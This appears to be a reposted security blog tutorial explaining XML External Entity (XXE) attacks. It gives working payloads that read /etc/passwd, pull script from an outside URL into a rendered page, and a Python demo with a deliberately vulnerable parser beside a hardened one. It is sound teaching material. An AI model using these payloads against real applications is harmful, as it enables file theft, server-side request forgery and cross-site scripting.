Nytro

XML External Entity attack (XXE) in a Nutshell

Posted on April 3, 2015 by chs

The XXE attack has been around for years, but it did not get much attention until the last couple of years, when high-profile cases at Facebook and PayPal were disclosed.

So, what is the XML External Entity attack? XXE is short for XML External Entity. Entities are part of the XML spec: a document's DTD can declare a named entity, and an external entity is one whose replacement text is fetched from somewhere outside the document (a file path or URL given as its SYSTEM identifier). If an application parses attacker-supplied XML with a parser that resolves such entities, the attacker chooses what gets fetched, and the fetched content ends up wherever the entity is used.

Some examples probably describe it best. Let's say we have a web app that takes an XML file as input and displays it in a table.

Example 1

Here's a sample input file:

[CODE]<?xml version="1.0" encoding="utf-8"?>
<contacts>
<contact>
<login>bobw</login>
<name>Bob Walker</name>
<email>bob@bob.com</email>
</contact>
<contact>
<login>ajones</login>
<name>Alice Jones</name>
<email>alice@alice.com</email>
</contact>
</contacts>[/CODE]

This is processed and displays the following:

[CODE]login    name         email
bobw     Bob Walker   bob@bob.com
ajones   Alice Jones  alice@alice.com[/CODE]

Pretty straightforward, right?

Example 2

Now let's take the same example and add an entity:

[CODE]<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY foo "Foo">
]>
<contacts>
<contact>
<login>&foo;</login>
<name>Bob Walker</name>
<email>bob@bob.com</email>
</contact>
<contact>
<login>ajones</login>
<name>Alice Jones</name>
<email>alice@alice.com</email>
</contact>
</contacts>[/CODE]

This processes and displays:

[CODE]login    name         email
Foo      Bob Walker   bob@bob.com
ajones   Alice Jones  alice@alice.com[/CODE]

What happened? On line 3 of the XML file we declared an entity called foo whose replacement text is the string "Foo". We then used that entity, &foo;, in place of Bob's username on line 7. While processing the document, the parser substituted "Foo" wherever it saw &foo;.

Example 3

Now let's do something really interesting. Consider the following:

[CODE]<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY foo SYSTEM "file:///etc/passwd">
]>
<contacts>
<contact>
<login>&foo;</login>
<name>Bob Walker</name>
<email>bob@bob.com</email>
</contact>
<contact>
<login>ajones</login>
<name>Alice Jones</name>
<email>alice@alice.com</email>
</contact>
</contacts>[/CODE]

This processes and displays:

[CODE]login                                        name         email
root:x:0:0:root:/root:/bin/bash <redacted>   Bob Walker   bob@bob.com
ajones                                       Alice Jones  alice@alice.com[/CODE]

What did it do? On line 3, the keyword SYSTEM marks the entity as external: its replacement text is fetched from the given URI rather than written in the declaration. Here the URI is file:///etc/passwd on the system that is processing the XML, so the parser reads that file with the privileges of the parsing process, substitutes its contents for &foo;, and the application dutifully displays them in the table. One caveat a tester will hit quickly: the fetched content is parsed as XML text, so a file containing characters such as < or & usually produces a parse error instead of being displayed.

Example 4

Up to this point, the attacks have been against the server. How can we attack the user?

Consider this:

[CODE]<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY foo SYSTEM "http://www.bitbucket.me/log/xss.php">
]>
<contacts>
<contact>
<login>&foo;</login>
<name>Bob Walker</name>
<email>bob@bob.com</email>
</contact>
<contact>
<login>ajones</login>
<name>Alice Jones</name>
<email>alice@alice.com</email>
</contact>
</contacts>[/CODE]

What do you think the external entity reference does here? The server fetches http://www.bitbucket.me/log/xss.php, and the response, <script>alert('xss')</script>, replaces &foo;. When the table is rendered, that script executes in the browser of whoever views it. (I'm not displaying the results like in the previous examples because it would execute while you are reading this; it's just an example showing that the app is vulnerable.) Note what had to happen for this to work: the server made an outbound HTTP request to a URL of the attacker's choosing, which is a server-side request forgery primitive in its own right; the response is parsed as XML, so markup in it becomes elements rather than text unless it is wrapped in a CDATA section; and the application echoed the value into the page without HTML-encoding it.
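To make Examples 3 and 4 concrete, here is an added example (not code from the original post) that reproduces both against a small contacts parser written with Python's standard-library xml.sax, alongside a hardened variant of the same parser. The parser, the ContactCollector and RejectDoctype classes, the AttackerHandler stand-in for www.bitbucket.me/log/xss.php, and the sample /etc/passwd line are all constructed for this example; the attacker's server runs on loopback so everything works offline. The vulnerable configuration re-enables external general entity resolution, which was Python's default before 3.7.1; the hardened one switches it off explicitly and refuses any DOCTYPE, so no entity can be declared at all.

```python
import io
import os
import tempfile
import threading
import urllib.request
import xml.sax
from http.server import BaseHTTPRequestHandler, HTTPServer
from xml.sax import handler
from xml.sax.handler import ContentHandler

XML_DECL = '<?xml version="1.0" encoding="utf-8"?>\n'
DOCTYPE_TEMPLATE = '<!DOCTYPE root [\n<!ENTITY foo SYSTEM "{uri}">\n]>\n'
CONTACTS_BODY = """<contacts>
  <contact><login>{login}</login><name>Bob Walker</name><email>bob@bob.com</email></contact>
  <contact><login>ajones</login><name>Alice Jones</name><email>alice@alice.com</email></contact>
</contacts>
"""
CLEAN_DOCUMENT = XML_DECL + CONTACTS_BODY.format(login="bobw")   # Example 1, constructed

def malicious_document(uri):
    """The post's payload: &foo; is an external entity used in place of Bob's login."""
    return XML_DECL + DOCTYPE_TEMPLATE.format(uri=uri) + CONTACTS_BODY.format(login="&foo;")

class ContactCollector(ContentHandler):
    """Builds the rows of the post's table: one dict per <contact>."""
    def __init__(self):
        super().__init__()
        self.contacts, self._field, self._buf = [], None, []

    def startElement(self, name, attrs):
        if name == "contact":
            self.contacts.append({})
        elif name in ("login", "name", "email"):
            self._field, self._buf = name, []

    def characters(self, content):
        if self._field is not None:   # replacement text of a resolved entity lands here too
            self._buf.append(content)

    def endElement(self, name):
        if name == self._field:
            self.contacts[-1][name] = "".join(self._buf)
            self._field = None

class RejectDoctype:
    """Lexical handler: abort the parse at the first DOCTYPE, so no entity can be declared."""
    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE is not allowed in a contacts upload")
    endDTD = startCDATA = endCDATA = comment = lambda self, *args: None   # required no-op callbacks

def parse_contacts(xml_text, hardened):
    """hardened=False is the XXE-prone setting (Python's default before 3.7.1);
    hardened=True turns external entities off explicitly and refuses any DOCTYPE."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, not hardened)
    if hardened:
        parser.setProperty(handler.property_lexical_handler, RejectDoctype())
    collector = ContactCollector()
    parser.setContentHandler(collector)
    parser.parse(io.StringIO(xml_text))
    return collector.contacts

class AttackerHandler(BaseHTTPRequestHandler):
    """Stand-in for www.bitbucket.me/log/xss.php: records the hit and returns script markup.
    The CDATA wrapper keeps the <script> tags as text; bare tags would be parsed as elements."""
    hits = []

    def do_GET(self):
        AttackerHandler.hits.append(self.path)
        body = b"<![CDATA[<script>alert('xss')</script>]]>"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the request log quiet
        pass

def xxe_file_read_demo():
    """Example 3, with a constructed temp file standing in for /etc/passwd."""
    with tempfile.NamedTemporaryFile("w", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash")   # constructed sample line
    try:
        return parse_contacts(malicious_document("file://" + f.name), hardened=False)[0]["login"]
    finally:
        os.unlink(f.name)

def xxe_http_fetch_demo():
    """Example 4: the server itself fetches the attacker's URL (SSRF) and inlines the reply."""
    urllib.request.install_opener(urllib.request.build_opener(urllib.request.ProxyHandler({})))  # direct
    server = HTTPServer(("127.0.0.1", 0), AttackerHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        url = "http://127.0.0.1:%d/log/xss.php" % server.server_address[1]
        login = parse_contacts(malicious_document(url), hardened=False)[0]["login"]
        return AttackerHandler.hits[-1], login
    finally:
        server.shutdown()
```

Running xxe_file_read_demo() returns the temp file's contents as Bob's login, and xxe_http_fetch_demo() returns the path the loopback server saw ("/log/xss.php") together with the script markup it handed back; parse_contacts(..., hardened=True) still parses CLEAN_DOCUMENT normally but raises ValueError on either payload before any entity is declared. Disabling the feature alone would also stop the fetch, but the entity would then silently expand to an empty string; refusing the DOCTYPE fails loudly and also shuts the door on internal-entity tricks such as entity expansion bombs.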

I hope these examples give you a basic understanding of what the XXE vulnerability is. Next week I’ll talk about how to prevent it.

Source: XML External Entity attack (XXE) in a Nutshell - Geeky Thoughts
